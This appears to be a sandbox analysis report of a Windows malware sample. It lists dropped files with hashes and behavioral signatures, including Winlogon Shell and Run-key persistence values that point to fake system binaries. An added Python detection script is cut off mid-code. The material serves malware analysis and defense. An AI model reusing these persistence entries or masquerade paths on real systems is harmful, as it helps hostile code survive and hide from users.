SHA512 b5f9df4a514f367c2371342df475181a0411e03d68cc57f61bbfcac967a5884119cbde5458854a5d5345f1bf5bc4129ce0d9490edabcb5a91e1befed504554dd

\??\c:\Users\Admin\AppData\Local\Temp\nr14kmka\nr14kmka.0.cs

MD5 779da4be05329609871d6ad0edf7a1e5
SHA1 7593d6753fbfe272af4d63a05a02be0340c92ed5
SHA256 accf0bb23319a6c296f608bc716f648675d258b3e7fb4031e94c85bdf0501498
SHA512 336336ead8d2dfcd01c1944fe5c2ff8c2f42cc00ed94f62cb3932271f455d11b9091e4d3c2dd07638c64c3526e6ed2e2f098c3fc7ce7cb56d89e6b018d7a1a7f

\??\c:\Windows\System32\CSC284368D78044F41BA30132654ADC74A.TMP

MD5 76193a570fc043b07f2da69ddc0d2266
SHA1 ff4eaaa5d3abed0831c72bbff23adae30f02e4ff
SHA256 a47b908b5cadfac55e3a1702f4e1bb4cfd9b5d7b27e1f6bfb395bc2b29cd3cc8
SHA512 4588c0ddfd356f096aed916e2aecfec09612595fa3864f1896d642a6d0c9294dd21287dadd6e2ccdfde0b6199de6985eba7b25d71364ef9dc17f2f49b6ac7473

C:\Users\Admin\AppData\Local\Temp\RES9470.tmp

MD5 efd3c28b67b39db672c1ba2f9948a916
SHA1 2e1b859d147f0dbac9cee962d4b2c8dcb90cf7a4
SHA256 0030fa6dfaa08e0879541049857d3b7f1052727a25d4c6877ad180a82ebb8514
SHA512 0cf50396999552baf97934206dfad163f396f2e0bfb90f594355d9fdb3c88cb8b117924eb46fa3b490ca3a77671df67f2dada9a2195686974b9a5e659c2f6ea6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d28a889fd956d5cb3accfbaf1143eb6f
SHA1 157ba54b365341f8ff06707d996b3635da8446f7
SHA256 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA512 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

memory/2336-215-0x0000021B6D070000-0x0000021B6D28C000-memory.dmp

memory/4816-218-0x000001E243A00000-0x000001E243C1C000-memory.dmp

memory/1976-220-0x000001DF70320000-0x000001DF7053C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cadef9abd087803c630df65264a6c81c
SHA1 babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256 cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA512 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2e907f77659a6601fcc408274894da2e
SHA1 9f5b72abef1cd7145bf37547cdb1b9254b4efe9d
SHA256 385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233
SHA512 34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

memory/540-232-0x000002AEEF760000-0x000002AEEF97C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bd5940f08d0be56e65e5f2aaf47c538e
SHA1 d7e31b87866e5e383ab5499da64aba50f03e8443
SHA256 2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6
SHA512 c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

C:\Users\Admin\AppData\Local\Temp\yRstqPcxW7.bat

MD5 c1be8d3f2ad3aab8070e1faf5835401a
SHA1 102a38c99a37078df15c838e09f58d2602be7604
SHA256 b985ab0a527efeaff6d8cd7f1028b6d5e86c7191e64b71ff433d9b4e62478b1e
SHA512 451242f57aeb1a7b67c88d54beb5f1089d4d3a8616aca8804a229a792e76c35d16739023febef16074bbdbede968f98e82ab3ab0f8d0cec4c8e84c6d624d0f56

memory/3860-245-0x000001E969F80000-0x000001E96A19C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3a6bad9528f8e23fb5c77fbd81fa28e8
SHA1 f127317c3bc6407f536c0f0600dcbcf1aabfba36
SHA256 986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05
SHA512 846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

memory/3608-241-0x0000021D249A0000-0x0000021D24BBC000-memory.dmp

memory/4348-240-0x0000027C273A0000-0x0000027C275BC000-memory.dmp

memory/3696-231-0x00000164EE220000-0x00000164EE43C000-memory.dmp

memory/4252-226-0x00000193B2F30000-0x00000193B314C000-memory.dmp

memory/2800-225-0x000001E57CF90000-0x000001E57D1AC000-memory.dmp

memory/3412-219-0x00000277B0910000-0x00000277B0B2C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d3e9c29fe44e90aae6ed30ccf799ca8
SHA1 c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA256 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA512 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/4552-246-0x000002582B590000-0x000002582B7AC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2ea91e7d1b473f8290ae52d13e105194
SHA1 5e565d99a7733250427e70f5f6e1951a081deed6
SHA256 712db2b991a3c11ccd71b36cfe99fad0b5b1eb1026b12d28c35a43334128671a
SHA512 0d6e2f0f8963986cb27a5cb853c5a87af5d2b65142ff082b4a12681b467d4a72efbcaea71307513523915aa4f27e7b238c67f4ab563f69525938f38253599424

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a4c5ca893b8b3ef8599cfed355385fd5
SHA1 deb71c93b20727734302d47aed85ab998ade27a0
SHA256 4e1d8e194558eca5db27b086e9c8b48685a41bd21ec9c686b943eaded3a2ad33
SHA512 36950dd1ad8b39f6e2c0768789fbed6d417f1f406af16c866ace049555fab06cc0b670b933512a956444e8d1eda3c3b01613cd2c7041dd5eafc5d04e5df9be41

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 815f9e54d2e55a6cd87a044f75fdba0c
SHA1 9e2c91b5d015a2f96539227ed0a5d83cf26f6c08
SHA256 ec7d07723ca9c032e3662c0a316318065854ed4dc54106a5214278cbd148e75f
SHA512 9198d94b9d3ef35693881e3dc3e1c7f4b42d98f23a27f58cec67309628504de6940f0ac58bff1de2923b9d1b2dd11be82ea98bad9419d2e22f610df01c7401a3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8846686b7f2d146c0baa27459eedbd8d
SHA1 c953a3d1c7870a9d7ded709301f3ae7f1ea94e61
SHA256 33e3dc5ccf5c09b1c26c524b284335712ef653a2b2169732d8d890f615026c65
SHA512 3e72136bff1772ae7934c67ead939b4783ffb9a3657a366881504c7a11e76abe6469b6a4701b031fd564e6d257f7c62f52fb69f93a67459fadf909fefbbe6154

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4f473e15a0686d0c819ad40b5f232368
SHA1 a769892ae2e8203e7d4a992a317189b56723da33
SHA256 53d6c0d9a801d45fefdcec9b3ecf217fef683efc4e40ba9c72f0116ee4d20237
SHA512 d9b43132432078d5496688717253e58e7caab0dcbd20fc41fa8a718d11d699e93ee198f18be4243ed34bcf8912e1377888fe72ae5b26d920e765ab523f0bdf55

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c65338524586fc00cf00e679a7d4a1f4
SHA1 62abf26bfb979dcbf7c7649cf8a681c2a8c7c9ae
SHA256 faa246e6b356f55ad8b18cea908dbf9035f67feaa06f8259d934306e13e88bf6
SHA512 c6721362afa4998c60ff60225a7b7571aaf1dbc8cb624ad7557b365a37df26e629763fa052dc31904b3175587e940d7e0630362620870c2c7351960a14c29310

memory/2140-393-0x000000001B780000-0x000000001B788000-memory.dmp

memory/2140-399-0x000000001B780000-0x000000001B788000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8JExSyzmRo.bat

MD5 5bbb2ba5759ff4f141a806be05974274
SHA1 4f60b200a12285536f09e1d751c66ad9c6d04605
SHA256 8117b9ccb1cb021f5c789278fd4cdaca04721651e505f77a7b066ffb8bc0d0d1
SHA512 875bee938c0dcedf2ea0f6a548f4cb4dc3068da49eafb3020f59a311d40233f3425e4ae931f2e8c89cf644a0d27bf5bc2b2eb73e92483a36a5e4c46694ccd79c

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RuntimeBroker.exe.log

MD5 7800fca2323a4130444c572374a030f4
SHA1 40c9b8e0e5e7d72a5293f4010f2ccf21e637b4aa
SHA256 29f5645ac14353ac460858f52c856548f3aeb144b09eef672a6b4849bafe742e
SHA512 c8a7ad930b8c07007c7a67d8c32a2a4a401dcc34ab966e0e80901655fcbe1f5c95b72a195e6381b1de56c2c987eeab093d8e89891bec9e9684785c5d824b3554

\??\c:\Users\Admin\AppData\Local\Temp\siuck4sj\siuck4sj.0.cs

MD5 89b1526851ceb7cd847d4b812125c204
SHA1 f23327b91a0fb8a3e25a71736177ccadc91b0c51
SHA256 2ca72821e0aa6718db4ecf749601b199fbd777bdca848b4ab5eb2f40e0d0d48a
SHA512 05ae1b407bac075396d20347f93d66c7d4449c93fd5c54d75ea4bb94b9f2f99eb9732812b4463932bfc70595cd1953e84f2d7a812e577fef8822d9de539ad9b5

\??\c:\Users\Admin\AppData\Local\Temp\siuck4sj\siuck4sj.cmdline

MD5 2af4e3a4ce3ce147cb2a82b4c0ea1497
SHA1 1583b6c9c660933ef796ed24d0c5c7517a99e5a5
SHA256 c23f324fe927dfab71be97374395165a57765b72da2684a56a3769c9510cf340
SHA512 3a794587c268b3beec79eaf4f8b4aa9954d8c01554aef279b87544ac8872abf2613597bf1b4af05b298f30b4dc064c349877b793604d93ac47f754174591a144

\??\c:\Recovery\WindowsRE\CSCA07083C9CF314723A6CD4948A81461.TMP

MD5 7d2e8e4e860af3f38678138d581169b7
SHA1 a19c108c0d67162d2cb5db8fbb4509bb964fc540
SHA256 dffe1888b89a6b0daf60389e236c2aaf6fc479101f832859e09156846c16b2dc
SHA512 d2b8b3285a967a0be399fbfffd19a99df980f27e0e27827625b688b4cd63c13115902770fdbae43da19c8209412bab8277eb94e5959fe893ee40cd2b620efd63

C:\Users\Admin\AppData\Local\Temp\RESE05.tmp

MD5 e51ed8be5499c5e68ca2567542fd1046
SHA1 3fdc77dad1f90773909580e935214343e4c737b7
SHA256 a1442f39be780010ae860388f70b01e504e1fea120bd6d7c8f450205ddef64bf
SHA512 419bd42cffd5663b4f7a845deb96a3b1cd6b0187895961d953849bd3be85496a9de5f8e698490095d0ddfd440073ca802efae11d1d4ff01d0841b7835104dfaa

\??\c:\Users\Admin\AppData\Local\Temp\xfvq1vqc\xfvq1vqc.0.cs

MD5 7a4df95e124d1aa1e8230a590ef597c8
SHA1 8da03d9b151ca2ef4d5ca2415410c99f74c22be3
SHA256 adaa2c00d92f5bd214ba5bb64985c12a42f441020da2cb09e7ff8e44f8dc9be0
SHA512 c1cd36b220ce6b52e21b65015c42ae282da10d034c008588782a06e96e48f2b28c61b358d8c5e549126ac6626c5e26b9780c5dbec386ba067a5ae6ce3e2ba23c

\??\c:\Users\Admin\AppData\Local\Temp\xfvq1vqc\xfvq1vqc.cmdline

MD5 fa0e0971aebde52256d36f745fe76e91
SHA1 8579e7e24e893c9700a29075311d0eafa08509e3
SHA256 f16e897535442e6ebd7baa0dd0ac4bc5945a11a4d035261f6529f4e5e447a55f
SHA512 7b868ba64fe3e05519f7db3568d49140da83ecea025f964645fe025ccab784bba8526ff17b941b5a025a51bb20fc924dbd71bf38a8947ffc1428f717cedda8bf

\??\c:\Recovery\WindowsRE\CSC671A800D3B124051996CE8178E9AE197.TMP

MD5 987ffb806ae972d4d819462882de79b5
SHA1 f83a142a5257aeaf4e4b1a6890a4a3dc5bc742af
SHA256 ccbc1d568bc16cfcacaf127122b7ffeacb1cf5c1237e0c5f3bc6921d9ab82496
SHA512 69c6c8bd9b3ddc4196d1d92e7e224d51d814aeed0c674790480ab321e5564b398c8fae97154e2ae508928e51066bef58a6cdcbd2528de71953facaa360f10937

C:\Users\Admin\AppData\Local\Temp\RESFBA.tmp

MD5 f32f7bd9b836f08c2ab9be3141074d0f
SHA1 9d5bbad61d8f0a176889ae9b7876d6788999da4b
SHA256 6526894232ccceefba49913cc9a587362b08a8f238ce704f29e2ee210fe3dc67
SHA512 002319f1b24619b519dc746f9036876023df81fc4a830d571f90cca253876d245205bd178a735c16248d27ba04b98f08f91bdb7020471e6eb255b17918545b4a

C:\Users\Admin\AppData\Local\Temp\RES11AE.tmp

MD5 b77511989053b30313dc0854682ab1cb
SHA1 9d404ff5a5b823064c50cf33833dacea6a2e890b
SHA256 9226fc1e00393abcd355bcafe926caa90c61d0fe01f209480dc6ecea034a9968
SHA512 8903ebc8ef5815929666922b685d7234eba64b6d4f6d08797db2d1cbdb0ac4c59fe1147627b8fa7b5bc971609481b22b5cd7a5a2eb08a93d33e4b563e13cc98b

\??\c:\comServerRefcrtNet\CSC40A8B3E794A14CB6B81AC9695A086B0.TMP

MD5 2b854aa4ad703ddd796b59a5b6213e83
SHA1 2dfa8f55c5c1a24e75aaff8362211c32ce5e37bb
SHA256 e3606666627a83b92b4ecc9c1df7c3f6a627ef8e49f477c249535ed4077f841e
SHA512 1d8748f0121b947c425514babbd9c87e7070caec1adcc1be598b513707376f22dddb9dbe31c71baf70ad30b46638b15caa89f5cf84b9b31065f8cc47ec386e64

\??\c:\Users\Admin\AppData\Local\Temp\u1elvbdo\u1elvbdo.0.cs

MD5 f6f74a7caf7a3bbc02d71d9ce8567cdf
SHA1 6a2218c8402d2e5de831771b9e9aaa1ad29fea6e
SHA256 b86f1c2388c9ba33ac6f83cdf74da3bdc9218dd1f275aaeec51c1b1105feecac
SHA512 1bc7d0b5018c289399ce0ed6f4299c04119a2ce30dad39d102c00e1c2f515127ac5d2e61a5146b724eb29e21b679bf818451f81c5d348acaa0661770b92cd9fb

\??\c:\Users\Admin\AppData\Local\Temp\u1elvbdo\u1elvbdo.cmdline

MD5 96c2314ffc31a7114569ffc2689722a6
SHA1 5f674025107850068b4263962ae74f2ba5b2473f
SHA256 cf36775c5a9aa3dcce34bcc066b27b070c93c73f7079c48e052ca67c56628918
SHA512 b6e4d3def3bda9f910cfa84d1f89ff7227c46cd442ab84ae49613be16363514fd0134884dfac4f226b42b3b8327bfd99fb2001a9270bdc01f12e28a2814446f3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9006afb2f47b3bb7d3669c647651e29c
SHA1 cdc0d7654be8e516df2c36accd9b52eac1f00ffd
SHA256 a025443b35555d64473b1ef01194239e808c49b47c924b99b942514036901302
SHA512 f2e72bbecfa823415bd0be7a091b1272e10e11059a71baf115780aa7ce3e694d114f6642de161ccba24e2182765b8188cc6dbb804fd07e318af9e1917549841c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 199108c775dd969e87b271021f7e932b
SHA1 42d36922a7ddde1022853ccd9f6a003a67609da9
SHA256 05e5c29da3162d644ee8449387379a211dc40a806b80a761b3b11afb266ba1cb
SHA512 0b3c97369cd70a837a2376150ec8487550390927ef39c478abbf0af080140ddbcaf09610e9e648f5b3b88323a417a6bb262383a8fe2153116a79d37c310ba723

\??\c:\Users\Admin\AppData\Local\Temp\ywdpcwvf\ywdpcwvf.cmdline

MD5 ebf73a3f91a80381598da351e244c992
SHA1 73e7756de15755a4187fe2c10bb59faaf581cbe4
SHA256 c97a000697f901efc0c8c3de16f05efd93ebe44a0e38dd05ddf538d28e62647c
SHA512 0e232f8dee066f4d401a2ccef50ab5c59293006ea0b94e58177a6b22c981f075f2fdb3c2b7051fa84aa0983f83174d996f467bd282c9440fabf60d75fb74eaf4

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-06 17:11

Reported

2024-07-06 17:15

Platform

win7-20240705-en

Max time kernel

39s

Max time network

81s

Command Line

"C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe"

Signatures

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\b2a802a2-3b12-11ef-8991-d2f1755c8afd\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\winlogon.exe\", \"C:\\Program Files (x86)\\Google\\Temp\\powershell.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\b2a802a2-3b12-11ef-8991-d2f1755c8afd\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\winlogon.exe\", \"C:\\Program Files (x86)\\Google\\Temp\\powershell.exe\", \"C:\\Program Files\\Internet Explorer\\en-US\\powershell.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\b2a802a2-3b12-11ef-8991-d2f1755c8afd\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\winlogon.exe\", \"C:\\Program Files (x86)\\Google\\Temp\\powershell.exe\", \"C:\\Program Files\\Internet Explorer\\en-US\\powershell.exe\", \"C:\\Recovery\\b2a802a2-3b12-11ef-8991-d2f1755c8afd\\conhost.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\b2a802a2-3b12-11ef-8991-d2f1755c8afd\\wininit.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\b2a802a2-3b12-11ef-8991-d2f1755c8afd\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\winlogon.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows\CurrentVersion\Run\powershell = "\"C:\\Program Files (x86)\\Google\\Temp\\powershell.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\powershell = "\"C:\\Program Files (x86)\\Google\\Temp\\powershell.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows\CurrentVersion\Run\powershell = "\"C:\\Program Files\\Internet Explorer\\en-US\\powershell.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\powershell = "\"C:\\Program Files\\Internet Explorer\\en-US\\powershell.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Recovery\\b2a802a2-3b12-11ef-8991-d2f1755c8afd\\conhost.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Recovery\\b2a802a2-3b12-11ef-8991-d2f1755c8afd\\wininit.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Recovery\\b2a802a2-3b12-11ef-8991-d2f1755c8afd\\wininit.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Recovery\\b2a802a2-3b12-11ef-8991-d2f1755c8afd\\conhost.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\winlogon.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\winlogon.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
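
The Winlogon Shell and Run values above share one trick: every entry is a real Windows binary name (wininit.exe, winlogon.exe, conhost.exe, powershell.exe) dropped into a directory where that binary never lives (C:\Recovery\..., C:\MSOCache\..., C:\Program Files (x86)\Google\Temp). The Python below is an added triage check, not part of the sandbox report or of any vendor tooling: it parses a Winlogon\Shell string the way the registry actually stores it (comma separated, quoted paths), parses the Run values, and flags any entry whose file name is a system binary but whose directory is not a system directory. SAMPLE_SHELL and SAMPLE_RUN are constructed from the behavioral1 rows above with the report's escaping removed; the function names, the SYSTEM_NAMES and LEGIT_DIRS lists and the three verdict labels are this example's own choices.

```python
import csv
from pathlib import PureWindowsPath

# Constructed input: the last Winlogon\Shell value and the Run values from the
# behavioral1 report, written as they would read in the registry.
SAMPLE_SHELL = (
    r'explorer.exe, "C:\Recovery\b2a802a2-3b12-11ef-8991-d2f1755c8afd\wininit.exe", '
    r'"C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\winlogon.exe", '
    r'"C:\Program Files (x86)\Google\Temp\powershell.exe", '
    r'"C:\Program Files\Internet Explorer\en-US\powershell.exe", '
    r'"C:\Recovery\b2a802a2-3b12-11ef-8991-d2f1755c8afd\conhost.exe"'
)
SAMPLE_RUN = {
    "powershell": r'"C:\Program Files (x86)\Google\Temp\powershell.exe"',
    "conhost": r'"C:\Recovery\b2a802a2-3b12-11ef-8991-d2f1755c8afd\conhost.exe"',
    "wininit": r'"C:\Recovery\b2a802a2-3b12-11ef-8991-d2f1755c8afd\wininit.exe"',
    "winlogon": r'"C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\winlogon.exe"',
}

# Windows binary names this sample borrows (assumed list; extend for your estate).
SYSTEM_NAMES = {"explorer.exe", "wininit.exe", "winlogon.exe", "conhost.exe", "cmd.exe",
                "powershell.exe", "runtimebroker.exe", "svchost.exe", "lsass.exe", "csrss.exe"}
# Directories those names legitimately live in (lower-case, no trailing backslash).
LEGIT_DIRS = {"c:\\windows", "c:\\windows\\system32", "c:\\windows\\syswow64",
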